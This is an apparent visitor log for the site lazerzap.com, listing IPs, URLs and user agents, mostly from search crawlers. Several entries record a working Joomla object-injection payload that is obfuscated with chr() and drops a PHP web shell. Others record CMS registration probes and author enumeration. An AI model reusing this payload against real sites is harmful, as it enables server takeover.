United States 216.244.66.241 http://www.lazerzap.com/index.php/mber/ts_files/ts_files/scroll.js www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 09 - 18:23 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 https://lazerzap.com/ Jul 09 - 18:27 United States 66.249.66.217 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 18:42 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 18:44 United States 159.65.180.162 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) No Referrer Jul 09 - 19:27 United States 159.65.242.163 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com) No Referrer Jul 09 - 19:43 United States 54.36.149.1 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 09 - 19:48 Switzerland 169.51.70.218 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; rv:44.1) Gecko/20100101 Firefox/44.1 http://lazerzap.com/ Jul 09 - 19:53 China 183.144.198.145 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£© http://www.atobo.com.cn/ Jul 09 - 19:54 Russian Federation 46.161.9.56 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 http://lazerzap.com/ Jul 09 - 20:44 United States 66.249.66.221 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 21:19 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 21:49 United States 35.173.172.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 09 - 21:49 United States 35.173.172.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 09 - 21:49 United States 35.173.172.95 http://lazerzap.com/?author=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 09 - 22:23 United States 40.77.167.91 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 23:21 China 180.76.15.11 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 23:21 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 23:41 China 180.76.15.149 http://www.lazerzap.com/index.php/component/visitor_data.html www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 00:15 United States 144.217.20.63 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 09 - 01:01 United States 54.36.149.0 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 09 - 01:29 United States 157.55.39.180 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 01:32 United States 157.55.39.180 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 01:36 China 123.125.71.44 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) No Referrer Jul 09 - 01:48 United States 35.205.72.181 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36 No Referrer Jul 09 - 01:49 185.220.101.44 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Linux Chrome Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36 http://burger-imperia.com/ Jul 09 - 02:14 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 02:17 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 09 - 02:30 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 09 - 02:36 United States 40.77.167.134 http://lazerzap.com/index.php/trackback/updatetopsites.php lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 02:37 China 14.215.176.4 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Firefox Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 http://www.baidu.com/s?wd=timeqzf Jul 09 - 02:38 China 36.110.163.22 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Mobile Safari/537.36 http://lazerzap.com/ Jul 09 - 03:30 United States 66.249.66.95 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 03:35 Russian Federation 5.143.0.153 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Chrome Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 YaBrowser/17.11.0.2191 Yowser/2.5 Safari/537.36 http://lazerzap.com/ Jul 09 - 03:36 United States 40.77.167.91 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 03:38 United States 40.77.167.91 http://lazerzap.com/index.php?option=com_user&view=register lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 03:38 United States 40.77.167.91 http://lazerzap.com/?author=2 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 03:38 United States 40.77.167.91 http://lazerzap.com/?nr=0 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 03:48 United States 157.55.39.180 http://lazerzap.com/?author=4 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 03:50 United States 13.57.233.99 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Chrome Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 No Referrer Jul 09 - 03:50 United States 54.36.148.169 http://lazerzap.com/index.php/component/users/ts_files/ts_files/visitor_data.html lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 09 - 03:53 United States 157.55.39.180 http://lazerzap.com/?author=3 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 04:00 United States 40.77.167.159 http://lazerzap.com/?author=0 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) No Referrer Jul 09 - 04:10 United States 17.58.102.88 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Macintosh Unknown Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot) No Referrer Jul 09 - 04:39 Ukraine 46.119.114.237 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 10.0; Win64; rv:33.1) Gecko/20100101 Firefox/33.1 http://www.lazerzap.com/ Jul 09 - 05:24 23.249.163.114 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown No Referrer Jul 09 - 05:32 United States 66.249.66.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 05:35 France 188.165.230.165 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 http://lazerzap.com/ Jul 09 - 05:59 United States 54.36.148.66 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/) No Referrer Jul 09 - 06:12 Russian Federation 46.161.9.3 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Firefox Mozilla/5.0 (Windows NT 5.0; rv:44.0) Gecko/20100101 Firefox/44.0 http://lazerzap.com/ Jul 09 - 06:14 United States 216.244.66.241 http://www.lazerzap.com/index.php/+/indexstyle.css www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com) No Referrer Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) http://lazerzap.com/ Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://lazerzap.com Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://lazerzap.com Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://lazerzap.com Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://lazerzap.com Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://lazerzap.com/index.php?m=member&c=index&a=register&siteid=1 Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/index.php?m=vote&c=index&a=post&subjectid=236&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://lazerzap.com/index.php?m=vote&c=index&a=post&subjectid=236&siteid=1 Jul 09 - 06:30 China 60.169.3.68 http://lazerzap.com/index.php?m=vote&c=index&a=result&subjectid=236&siteid=1 lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 7 Internet Explorer 9 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) http://lazerzap.com/index.php?m=vote&c=index&a=result&subjectid=236&siteid=1 Jul 09 - 07:45 United States 66.249.66.64 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Android Chrome Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) No Referrer Jul 09 - 07:46 Poland 195.22.126.40 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Firefox Mozilla/5.0 (Windows NT 7.0; rv:33.1) Gecko/20100101 Firefox/33.1 http://lazerzap.com/ Jul 09 - 07:54 Viet Nam 42.118.134.236 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win XP Firefox Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x No Referrer Jul 09 - 08:11 Netherlands 46.229.161.131 http://lazerzap.com/ lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown SEMrushBot No Referrer Jul 09 - 08:42 China 61.160.213.170 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Win 2000 Internet Explorer 6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) http://www.lazerzap.com/ Jul 09 - 08:42 China 61.160.213.170 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://www.lazerzap.com Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://www.lazerzap.com Jul 09 - 08:43 China 61.160.213.170 http://www.lazerzap.com/ www.lazerzap.com 173.249.55.220 [WHOIS] [PING] [HTTP] [FTP] [TELNET] Unrecognised Unknown }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:729:"eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(111).chr(98).chr(111).chr(116).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(120).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}ğııı http://www.lazerzap.com Jul 09 